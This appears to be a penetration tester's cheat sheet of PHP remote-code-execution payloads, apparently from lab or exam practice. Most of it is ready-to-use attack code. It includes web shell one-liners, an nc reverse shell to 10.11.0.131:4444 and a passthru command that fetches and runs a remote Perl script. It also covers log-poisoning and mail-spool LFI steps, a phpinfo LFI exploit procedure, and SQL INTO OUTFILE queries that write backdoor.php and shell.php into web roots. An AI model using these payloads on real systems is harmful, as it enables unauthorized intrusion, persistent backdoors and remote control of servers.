PHP rce

PHP SYSTEM/SHELL_EXEC

<?php echo shell_exec($_GET['cmd']);?>
<?php echo system($_REQUEST['hack']); ?>
<?php system($_GET['hack']); ?>

# RFI
<?php system('nc.exe -v 10.11.0.131 4444 -e cmd.exe'); ?>

FREE BSE wget reverse shell

Theres no wget in BSD! So use fetch

<?php passthru("mkdir /tmp/temp/ && fetch -qo /tmp/temp/callme.pl http://10.11.0.69/callme.pl && perl /tmp/temp/callme.pl");?>'

Log poisoning LFI RCE

1. Burp inject php code in User-Agent User-Agent: <?php system($_REQUEST['hack']); ?>

2. Check logs at /var/log/httpd-access.log

3. Use LFI to RCE 10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&hack=uname

PHPINFO LFI RCE

You have LFI and can view phpinfo.php. Upload file is turned on.

file_uploads = On

(step 1) wget https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/File%20Inclusion/phpinfolfi.py

(Step 2) Modify payload to include pentest monkey's reverse shell between start and end

If script doesnt work check the comparison operator greater than

At line 203

At line 262

(Step 3) Update LFI script url (apply %00 null byte terminator if needed) - note the double percent variable is %%00

(Step 4) Start nc listener to catch reverse shell and run python script.

python phpinfolfi.py 10.10.10.84 80 100

LFI RCE using /var/email

See SMTP cheatsheet, send email with file below:

<?php echo system($_REQUEST['hack']); ?>

Using burpsuite, execute RCE using the LFI and commands

../var/mail/emailUserName..........&hack=whoami

MYSQL Writing PHP reverse shell with wget

select "<?php shell_exec('wget http://10.10.14.4/php-reverse-shell.php -O shell1.php'); ?> into outfile "/var/www/html/dlexp.php"

SQL Code Execution

select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php" to upload

SQL Create file using INTO OUTFILE

10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'